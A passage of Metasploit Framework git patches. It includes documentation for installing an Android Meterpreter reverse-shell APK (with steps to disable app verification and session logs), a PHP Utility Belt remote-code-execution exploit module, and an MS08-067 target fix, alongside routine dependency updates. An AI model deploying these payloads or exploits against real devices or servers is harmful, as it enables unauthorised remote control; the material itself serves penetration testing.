+3. In msfconsole, start a handler for android/meterpreter/reverse_tcp +4. Run the installer script like this from a terminal: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk +``` + +The the script will do something like this: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk + adding: META-INF/ANDROIDD.SF + adding: META-INF/ANDROIDD.RSA + signing: classes.dex + signing: AndroidManifest.xml + signing: resources.arsc +Failure +1562 KB/s (10715 bytes in 0.006s) + pkg: /data/local/tmp/android.apk +Success +rm failed for -f, Read-only file system +Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity } +``` + +Back to msfconsole, you should receive a session: + +``` +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] Starting the payload handler... +[*] Sending stage (62432 bytes) to 192.168.1.199 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600 + +meterpreter > +``` + +**Uploading APK to a real Android device using install_msf_apk.sh** + +On the Android device, make sure to enable Developer Options. You can do this by: + +1. Go to Settings -> About -> Software Information +2. Tap on the Build Number section a couple of times. It should unlock Developer Options. +3. Go back to the Settings page, you should see Developer Options. + +Under Developer Options, make sure to: + +* Enable USB debugging +* Disable Verify apps via USB +* Open a terminal, and type: ```adb devices```. On your Android device, you should see a prompt + asking you to allow the computer for debugging, click OK on that. +* Do: ```adb devices``` again, adb should now have access. + +Run the installer script like this from a terminal: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk +``` + +And you should get a session. + + + +**Uploading APK from a Web Server** + +One way to upload an APK to Android without adb is by hosting it from a web server. To do this, +you must make sure to allow to trust "Unknown sources". Exactly how to do this varies, but normally +it's something like this: Settings -> Security -> Check "Unknown Sources" + +Once you have that changed, do: + +1. Generate the APK payload. +2. Start a web server from the directory where the payload is: ```ruby -run -e httpd . -p 8181``` +3. On your Android device, open a browser, and download the APK. +4. You should be able to find the APK from the Downloads folder, install it. +5. After installation, you will have to manually execute it. + +**Reconnect Android Meterpreter from the Browser Remotely** + +When you have the APK payload installed on your Android device, another trick to reconnect it is to +launch an intent from a browser - a term in Android development meaning an operation to be +performed. + +To do this, here is how: + +1. In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job. +2. Do: ```auxiliary/server/android_browsable_msf_launch```. +3. Set the URIPATh if needed. +4. Do: ```run```. At this point, the web server should be up. +5. On your Android device, open the native web browser, and go the URL generated by the auxiliary + module. +6. The Android handler should get a session like the following demo: + +``` +msf > use exploit/multi/handler +msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp +PAYLOAD => android/meterpreter/reverse_tcp +msf exploit(handler) > set LHOST 192.168.1.199 +LHOST => 192.168.1.199 +msf exploit(handler) > set EXITONSESSION false +EXITONSESSION => false +msf exploit(handler) > run -j +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.1.199:4444 +msf exploit(handler) > [*] Starting the payload handler... + +msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch +msf auxiliary(android_browsable_msf_launch) > set URIPATH /test +URIPATH => /test +msf auxiliary(android_browsable_msf_launch) > run + +[*] Using URL: http://0.0.0.0:8080/test +[*] Local IP: http://192.168.1.199:8080/test +[*] Server started. +[*] Sending HTML... +[*] Sending stage (62432 bytes) to 192.168.1.207 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600 +``` From e4179091113eb8072f953459dfed581b3524bd91 Mon Sep 17 00:00:00 2001 From: Fakhri Zulkifli Date: Wed, 9 Mar 2016 11:21:07 +0800 Subject: [PATCH 525/686] Update ipv6_neighbor_router_advertisement.rb --- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 4b1d988dce..976bf3b9f0 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, - 'Author' => 'wuntee, d0lph1n98', + 'Author' => ['wuntee, d0lph1n98'], 'License' => MSF_LICENSE, 'References' => [ From 45c7e4b6ae3b19171e6deb1ce089efc6cd772d4e Mon Sep 17 00:00:00 2001 From: Fakhri Zulkifli Date: Wed, 9 Mar 2016 11:21:24 +0800 Subject: [PATCH 526/686] Update ipv6_neighbor_router_advertisement.rb --- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 976bf3b9f0..26b4e43eae 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, - 'Author' => ['wuntee, d0lph1n98'], + 'Author' => ['wuntee', 'd0lph1n98'], 'License' => MSF_LICENSE, 'References' => [ From 179d38b914cf953f31ef68b7501e1976e140b161 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 9 Mar 2016 11:05:34 -0600 Subject: [PATCH 527/686] Fix #6658, MS08-067 unable to find the right target for W2k3SP0 Fix #6658. When there is no service pack, the Msf::Exploit::Remote::SMB#smb_fingerprint_windows_sp method returns an empty string. But in the MS08-067 exploit, instead of check an empty string, it checks for "No Service Pack", which causes it to never detect the right target for Windows Server 2003 SP0. --- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a1e8de1191..c01ba17daf 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -879,7 +879,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Windows 2003 SP0 is mostly universal - if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' + if fprint['os'] == 'Windows 2003' and fprint['sp'].empty? mytarget = targets[3] end From 15ba85bac28caa5b7cda4b6ce613e9971b6a3d03 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 9 Mar 2016 13:29:35 -0600 Subject: [PATCH 528/686] fix missed deprecations missed some deprecation warnings --- lib/msf/core/db_manager/module_cache.rb | 24 ++++++++++----------- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- 2 files changed, 13 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/db_manager/module_cache.rb b/lib/msf/core/db_manager/module_cache.rb index 5e23cb6d2c..06af2be5be 100644 --- a/lib/msf/core/db_manager/module_cache.rb +++ b/lib/msf/core/db_manager/module_cache.rb @@ -201,7 +201,7 @@ module Msf::DBManager::ModuleCache end end - query = Mdm::Module::Detail.scoped + query = Mdm::Module::Detail.all ActiveRecord::Base.connection_pool.with_connection do # Although AREL supports taking the union or two queries, the ActiveRecord where syntax only supports @@ -214,7 +214,7 @@ module Msf::DBManager::ModuleCache when 'author' formatted_values = match_values(value_set) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) module_authors = Mdm::Module::Author.arel_table union_conditions << module_authors[:email].matches_any(formatted_values) union_conditions << module_authors[:name].matches_any(formatted_values) @@ -227,10 +227,10 @@ module Msf::DBManager::ModuleCache when 'os', 'platform' formatted_values = match_values(value_set) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'text' formatted_values = match_values(value_set) @@ -240,22 +240,22 @@ module Msf::DBManager::ModuleCache union_conditions << module_details[:fullname].matches_any(formatted_values) union_conditions << module_details[:name].matches_any(formatted_values) - query = query.includes(:actions) + query = query.includes(:actions).references(:actions) union_conditions << Mdm::Module::Action.arel_table[:name].matches_any(formatted_values) - query = query.includes(:archs) + query = query.includes(:archs).references(:archs) union_conditions << Mdm::Module::Arch.arel_table[:name].matches_any(formatted_values) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) union_conditions << Mdm::Module::Author.arel_table[:name].matches_any(formatted_values) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) - query = query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'type' formatted_values = match_values(value_set) @@ -275,7 +275,7 @@ module Msf::DBManager::ModuleCache when 'ref' formatted_values = match_values(value_set) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) when 'cve', 'bid', 'osvdb', 'edb' formatted_values = value_set.collect { |value| @@ -284,7 +284,7 @@ module Msf::DBManager::ModuleCache "#{prefix}-%#{value}%" } - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) end end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index adf95b3f6a..8e674f0d4a 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1033,7 +1033,7 @@ class Db ::ActiveRecord::Base.connection_pool.with_connection { query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace ) - query = query.includes(:private, :public, :logins) + query = query.includes(:private, :public, :logins).references(:private, :public, :logins) query = query.includes(logins: [ :service, { service: :host } ]) if type.present? From 52d12b68ae5fa727419b4248be5d90c638aab3cd Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 9 Mar 2016 14:08:26 -0600 Subject: [PATCH 529/686] Clean up module --- .../multi/http/php_utility_belt_rce.rb | 55 ++++++++++--------- 1 file changed, 29 insertions(+), 26 deletions(-) diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb index d2665df9fa..a6ac87ad4f 100644 --- a/modules/exploits/multi/http/php_utility_belt_rce.rb +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -6,73 +6,76 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - def initialize(info={}) + def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Utility Belt Remote Code Execution', 'Description' => %q{ - This module exploits a remote code execution vulnerability in PHP utility Belt + This module exploits a remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a - production environment because this application runs arbitrary PHP code as an + production environment, since this application runs arbitrary PHP code as an intended functionality. }, - 'License' => MSF_LICENSE, 'Author' => [ - 'WICS', # initial discovery + 'WICS', # initial discovery 'Jay Turla' # msf ], 'References' => [ - [ 'EDB', '38901' ], - [ 'URL', 'https://github.com/mboynes/php-utility-belt' ] # Official Repo + ['EDB', '38901'], + ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo ], + 'DisclosureDate' => 'Aug 12 2015', + 'License' => MSF_LICENSE, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, 'Privileged' => false, 'Payload' => { - 'Space' => 2000, - 'DisableNops' => true, + 'Space' => 2000, + 'DisableNops' => true }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, 'Targets' => [ - ['PHP Utility Belt', { } ] + ['PHP Utility Belt', {}] ], - 'DisclosureDate' => 'Aug 12 2015', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptString.new('TARGETURI', [true, 'The path of PHP utility belt', '/php-utility-belt/ajax.php']), - ],self.class) + OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']) + ], self.class) end def check txt = Rex::Text.rand_text_alpha(8) res = http_send_command("echo #{txt};") - if res && res.body =~ /#{txt}/ - return Exploit::CheckCode::Vulnerable + if res && res.body.include?(txt) + Exploit::CheckCode::Vulnerable else - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end end + def exploit + http_send_command(payload.encoded) + end + def http_send_command(cmd) - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path), + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'code' => cmd } - }) + ) end - def exploit - http_send_command("#{payload.encoded}") - end end From ca189962725d9d5bc2b45f166e2e42a04688b17d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 9 Mar 2016 15:35:00 -0600 Subject: [PATCH 530/686] setup rails staging branch rails 4.1 baby! --- Gemfile | 8 + Gemfile.lock | 201 +++++++++++------- .../framework/rails_version_constraint.rb | 2 +- metasploit-framework.gemspec | 6 +- 4 files changed, 138 insertions(+), 79 deletions(-) diff --git a/Gemfile b/Gemfile index c5eeb2523e..910bc61362 100755 --- a/Gemfile +++ b/Gemfile @@ -3,6 +3,14 @@ source 'https://rubygems.org' # spec.add_runtime_dependency '', [] gemspec name: 'metasploit-framework' +# rails-upgrade staging gems +gem 'metasploit-yard', github: 'rapid7/metasploit-yard', branch: 'staging/rails-upgrade' +gem 'metasploit-erd', github: 'rapid7/metasploit-erd', branch: 'staging/rails-upgrade' +gem 'yard-metasploit-erd', github: 'rapid7/yard-metasploit-erd', branch: 'staging/rails-upgrade' +gem 'metasploit-concern', github: 'rapid7/metasploit-concern', branch: 'staging/rails-upgrade' +gem 'metasploit-model', github: 'rapid7/metasploit-model', branch: 'staging/rails-upgrade' +gem 'metasploit_data_models', github: 'rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' + # separate from test as simplecov is not run on travis-ci group :coverage do # code coverage for tests diff --git a/Gemfile.lock b/Gemfile.lock index 71b52b47c9..7fafb68a8f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,20 +1,83 @@ +GIT + remote: git://github.com/rapid7/metasploit-concern.git + revision: 25955570f568e3dca4d7c8123c9cdd660d77ad84 + branch: staging/rails-upgrade + specs: + metasploit-concern (1.1.0) + activemodel (>= 4.1, < 4.2) + activesupport (>= 4.1, < 4.2) + railties (>= 4.1, < 4.2) + +GIT + remote: git://github.com/rapid7/metasploit-erd.git + revision: 0e89e5028340f6fa7b8332f8517b4cd0065861ab + branch: staging/rails-upgrade + specs: + metasploit-erd (1.1.0) + activerecord (>= 4.1.0, < 4.2) + activesupport (>= 4.1.0, < 4.2) + rails-erd (~> 1.1) + +GIT + remote: git://github.com/rapid7/metasploit-model.git + revision: 7ed461f7a8ef543397be9cdf06a0b910f8090327 + branch: staging/rails-upgrade + specs: + metasploit-model (1.1.0) + activemodel (>= 4.1, < 4.2) + activesupport (>= 4.1, < 4.2) + railties (>= 4.1, < 4.2) + +GIT + remote: git://github.com/rapid7/metasploit-yard.git + revision: 5db7698ebed25d775b94f0cbaef9ece4ae3255b3 + branch: staging/rails-upgrade + specs: + metasploit-yard (1.1.0) + rake + redcarpet + yard + +GIT + remote: git://github.com/rapid7/metasploit_data_models.git + revision: 7870250dba97b4d529d6ecb7af3ab726f91a5b7e + branch: staging/rails-upgrade + specs: + metasploit_data_models (1.3.0) + activerecord (>= 4.1, < 4.2) + activesupport (>= 4.1, < 4.2) + arel-helpers + metasploit-concern + metasploit-model + pg + postgres_ext + railties (>= 4.1, < 4.2) + recog (~> 2.0) + +GIT + remote: git://github.com/rapid7/yard-metasploit-erd.git + revision: 6627ab547e86690272fcd39d8eb89fa4c6194d6e + branch: staging/rails-upgrade + specs: + yard-metasploit-erd (1.1.0) + metasploit-erd + rails-erd + yard + PATH remote: . specs: metasploit-framework (4.11.15) - actionpack (>= 4.0.9, < 4.1.0) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) + actionpack (>= 4.1.0, < 4.2.0) + activerecord (>= 4.1.0, < 4.2.0) + activesupport (>= 4.1.0, < 4.2.0) bcrypt filesize jsobfu (~> 0.4.1) json metasm (~> 1.0.2) - metasploit-concern - metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) metasploit-payloads (= 1.1.2) - metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) nokogiri @@ -33,31 +96,33 @@ PATH GEM remote: https://rubygems.org/ specs: - actionmailer (4.0.13) - actionpack (= 4.0.13) + actionmailer (4.1.15) + actionpack (= 4.1.15) + actionview (= 4.1.15) mail (~> 2.5, >= 2.5.4) - actionpack (4.0.13) - activesupport (= 4.0.13) - builder (~> 3.1.0) - erubis (~> 2.7.0) + actionpack (4.1.15) + actionview (= 4.1.15) + activesupport (= 4.1.15) rack (~> 1.5.2) rack-test (~> 0.6.2) - activemodel (4.0.13) - activesupport (= 4.0.13) - builder (~> 3.1.0) - activerecord (4.0.13) - activemodel (= 4.0.13) - activerecord-deprecated_finders (~> 1.0.2) - activesupport (= 4.0.13) - arel (~> 4.0.0) - activerecord-deprecated_finders (1.0.4) - activesupport (4.0.13) + actionview (4.1.15) + activesupport (= 4.1.15) + builder (~> 3.1) + erubis (~> 2.7.0) + activemodel (4.1.15) + activesupport (= 4.1.15) + builder (~> 3.1) + activerecord (4.1.15) + activemodel (= 4.1.15) + activesupport (= 4.1.15) + arel (~> 5.0.0) + activesupport (4.1.15) i18n (~> 0.6, >= 0.6.9) - minitest (~> 4.2) - multi_json (~> 1.3) + json (~> 1.7, >= 1.7.7) + minitest (~> 5.1) thread_safe (~> 0.1) - tzinfo (~> 0.3.37) - arel (4.0.2) + tzinfo (~> 1.1) + arel (5.0.1.20140414130214) arel-helpers (2.2.0) activerecord (>= 3.1.0, < 5) aruba (0.6.2) @@ -65,7 +130,7 @@ GEM cucumber (>= 1.1.1) rspec-expectations (>= 2.7.0) bcrypt (3.1.11) - builder (3.1.4) + builder (3.2.2) capybara (2.4.4) mime-types (>= 1.16) nokogiri (>= 1.3.3) @@ -74,7 +139,9 @@ GEM xpath (~> 2.0) childprocess (0.5.5) ffi (~> 1.0, >= 1.0.11) + choice (0.2.0) coderay (1.1.0) + concurrent-ruby (1.0.1) cucumber (1.3.19) builder (>= 2.1.2) diff-lcs (>= 1.1.3) @@ -100,7 +167,6 @@ GEM fivemat (1.3.2) gherkin (2.12.2) multi_json (~> 1.3) - hike (1.2.3) i18n (0.7.0) jsobfu (0.4.1) rkelly-remix (= 0.0.6) @@ -108,37 +174,11 @@ GEM mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) - metasploit-concern (1.1.0) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - railties (>= 4.0.9, < 4.1.0) - metasploit-credential (1.1.0) - metasploit-concern (~> 1.1) - metasploit-model (~> 1.1) - metasploit_data_models (~> 1.3) - pg - railties - rubyntlm - rubyzip (~> 1.1) - metasploit-model (1.1.0) - activemodel (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - railties (>= 4.0.9, < 4.1.0) metasploit-payloads (1.1.2) - metasploit_data_models (1.3.0) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - arel-helpers - metasploit-concern (~> 1.1) - metasploit-model (~> 1.1) - pg - postgres_ext - railties (>= 4.0.9, < 4.1.0) - recog (~> 2.0) method_source (0.8.2) - mime-types (2.6.1) + mime-types (2.99.1) mini_portile2 (2.0.0) - minitest (4.7.5) + minitest (5.8.4) msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) @@ -163,20 +203,27 @@ GEM rack (1.5.5) rack-test (0.6.3) rack (>= 1.0) - rails (4.0.13) - actionmailer (= 4.0.13) - actionpack (= 4.0.13) - activerecord (= 4.0.13) - activesupport (= 4.0.13) + rails (4.1.15) + actionmailer (= 4.1.15) + actionpack (= 4.1.15) + actionview (= 4.1.15) + activemodel (= 4.1.15) + activerecord (= 4.1.15) + activesupport (= 4.1.15) bundler (>= 1.3.0, < 2.0) - railties (= 4.0.13) + railties (= 4.1.15) sprockets-rails (~> 2.0) - railties (4.0.13) - actionpack (= 4.0.13) - activesupport (= 4.0.13) + rails-erd (1.4.6) + activerecord (>= 3.2) + activesupport (>= 3.2) + choice (~> 0.2.0) + ruby-graphviz (~> 1.2) + railties (4.1.15) + actionpack (= 4.1.15) + activesupport (= 4.1.15) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (10.4.2) + rake (11.0.1) rb-readline-r7 (0.5.2.0) recog (2.0.14) nokogiri @@ -200,7 +247,7 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.6.0) + ruby-graphviz (1.2.2) rubyzip (1.2.0) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) @@ -210,21 +257,19 @@ GEM simplecov-html (~> 0.9.0) simplecov-html (0.9.0) slop (3.6.0) - sprockets (2.12.3) - hike (~> 1.2) - multi_json (~> 1.0) - rack (~> 1.0) - tilt (~> 1.1, != 1.3.0) - sprockets-rails (2.2.4) + sprockets (3.5.2) + concurrent-ruby (~> 1.0) + rack (> 1, < 3) + sprockets-rails (2.3.3) actionpack (>= 3.0) activesupport (>= 3.0) sprockets (>= 2.8, < 4.0) sqlite3 (1.3.11) thor (0.19.1) thread_safe (0.3.5) - tilt (1.4.1) timecop (0.7.3) - tzinfo (0.3.45) + tzinfo (1.2.2) + thread_safe (~> 0.1) xpath (2.0.0) nokogiri (~> 1.3) yard (0.8.7.6) @@ -237,7 +282,12 @@ DEPENDENCIES cucumber-rails factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) + metasploit-concern! + metasploit-erd! metasploit-framework! + metasploit-model! + metasploit-yard! + metasploit_data_models! pry rake (>= 10.0.0) redcarpet @@ -246,3 +296,4 @@ DEPENDENCIES simplecov timecop yard + yard-metasploit-erd! diff --git a/lib/metasploit/framework/rails_version_constraint.rb b/lib/metasploit/framework/rails_version_constraint.rb index 6258becfb0..8f0500189d 100644 --- a/lib/metasploit/framework/rails_version_constraint.rb +++ b/lib/metasploit/framework/rails_version_constraint.rb @@ -5,7 +5,7 @@ module Metasploit module RailsVersionConstraint # The Metasploit ecosystem is not yet ready for Rails 4.1: - RAILS_VERSION = [ '>= 4.0.9', '< 4.1.0' ] + RAILS_VERSION = [ '>= 4.1.0', '< 4.2.0' ] end end end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 249c2f284f..7caba00608 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -61,11 +61,11 @@ Gem::Specification.new do |spec| # Metasm compiler/decompiler/assembler spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - spec.add_runtime_dependency 'metasploit-concern' + #spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '1.1.0' + #spec.add_runtime_dependency 'metasploit-credential', '1.1.0' # Database models shared between framework and Pro. - spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' + #spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' # Things that would normally be part of the database model, but which # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' From 1911d0cd1795ff500d61f918722f2863d0f8138c Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 9 Mar 2016 15:39:06 -0600 Subject: [PATCH 531/686] missed credential --- Gemfile | 1 + Gemfile.lock | 16 ++++++++++++++++ 2 files changed, 17 insertions(+) diff --git a/Gemfile b/Gemfile index 910bc61362..efced5ce12 100755 --- a/Gemfile +++ b/Gemfile @@ -10,6 +10,7 @@ gem 'yard-metasploit-erd', github: 'rapid7/yard-metasploit-erd', branch: ' gem 'metasploit-concern', github: 'rapid7/metasploit-concern', branch: 'staging/rails-upgrade' gem 'metasploit-model', github: 'rapid7/metasploit-model', branch: 'staging/rails-upgrade' gem 'metasploit_data_models', github: 'rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' +gem 'metasploit-credential', github: 'rapid7/metasploit-credential', branch: 'staging/rails-upgrade' # separate from test as simplecov is not run on travis-ci group :coverage do diff --git a/Gemfile.lock b/Gemfile.lock index 7fafb68a8f..e2e287d4d0 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -8,6 +8,20 @@ GIT activesupport (>= 4.1, < 4.2) railties (>= 4.1, < 4.2) +GIT + remote: git://github.com/rapid7/metasploit-credential.git + revision: 8ab9f2dc9f207341bbfe63cdf94a8723750435be + branch: staging/rails-upgrade + specs: + metasploit-credential (1.1.0) + metasploit-concern + metasploit-model + metasploit_data_models + pg + railties + rubyntlm + rubyzip (~> 1.1) + GIT remote: git://github.com/rapid7/metasploit-erd.git revision: 0e89e5028340f6fa7b8332f8517b4cd0065861ab @@ -248,6 +262,7 @@ GEM rspec-support (~> 3.3.0) rspec-support (3.3.0) ruby-graphviz (1.2.2) + rubyntlm (0.6.0) rubyzip (1.2.0) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) @@ -283,6 +298,7 @@ DEPENDENCIES factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) metasploit-concern! + metasploit-credential! metasploit-erd! metasploit-framework! metasploit-model! From 38bc8c88ae0702700d27b91b1f39a72db72b3d20 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 9 Mar 2016 17:10:22 -0600 Subject: [PATCH 532/686] Fix open_webrtc_browser Fix a bug where the code might spawn multiple browsers. --- lib/rex/compat.rb | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 46d61dae15..71f8587bfc 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -149,8 +149,6 @@ def self.open_browser(url='http://google.com/') end def self.open_webrtc_browser(url='http://google.com/') - found_browser = false - case RUBY_PLATFORM when /mswin2|mingw|cygwin/ paths = [ @@ -170,8 +168,7 @@ def self.open_webrtc_browser(url='http://google.com/') if File.exists?(path) args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : "" system("#{path} #{args} #{url}") - found_browser = true - break + return true end end @@ -182,8 +179,7 @@ def self.open_webrtc_browser(url='http://google.com/') args = (browser_path =~ /Chrome/) ? "--args --allow-file-access-from-files" : "" system("open #{url} -a \"#{browser_path}\" #{args} &") - found_browser = true - break + return true end end else @@ -194,15 +190,14 @@ def self.open_webrtc_browser(url='http://google.com/') if File.exists?(browser_path) args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : "" system("#{browser_path} #{args} #{url} &") - found_browser = true - break + return true end end end end end - found_browser + false end def self.open_email(addr) From 5554138fac4f090625ad0b6f3a982b4437ddb1e7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 9 Mar 2016 23:08:19 -0600 Subject: [PATCH 533/686] Change the firing order Ubuntu has this glib bug (g_slice_set_config) that results us seeing a bunch of warnings when we call system("firefox") in Ruby. It doesn't look like our fault, but since this generates a lot of text on msfconsole, we try to avoid that. --- lib/rex/compat.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 71f8587bfc..24b94fb1d0 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -184,7 +184,7 @@ def self.open_webrtc_browser(url='http://google.com/') end else if defined? ENV['PATH'] - ['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser| + ['google-chrome', 'chrome', 'chromium', 'firefox' , 'firefox', 'opera'].each do |browser| ENV['PATH'].split(':').each do |path| browser_path = "#{path}/#{browser}" if File.exists?(browser_path) From d6742c4097424378383e1f57badbe50c708ab4ea Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 10 Mar 2016 10:44:18 -0600 Subject: [PATCH 534/686] Change
    color --- data/markdown_doc/markdown.css | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index 56e5948b78..abe2aec153 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -53,7 +53,7 @@ h6 { hr { margin: 0 0 19px; border: 0; - border-bottom: 1px solid #ccc; + border-bottom: 1px solid #eee; } blockquote { padding: 13px 13px 21px 15px; From b878e762c0705a5fd109c686328b1508595876e0 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 10 Mar 2016 15:39:06 -0600 Subject: [PATCH 535/686] pin rake version to 1.x line rake 11 remvoes the last_comment method which causes a error when trying to run rake jobs current guidance is to pin the version back to before the change MS-1230 --- Gemfile | 2 +- Gemfile.lock | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile b/Gemfile index efced5ce12..d7ac7c4cbf 100755 --- a/Gemfile +++ b/Gemfile @@ -36,7 +36,7 @@ group :development, :test do # Make rspec output shorter and more useful gem 'fivemat', '~> 1.3.1' # running documentation generation tasks and rspec tasks - gem 'rake', '>= 10.0.0' + gem 'rake', '~> 10.5' # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the # environment is development gem 'rspec-rails' 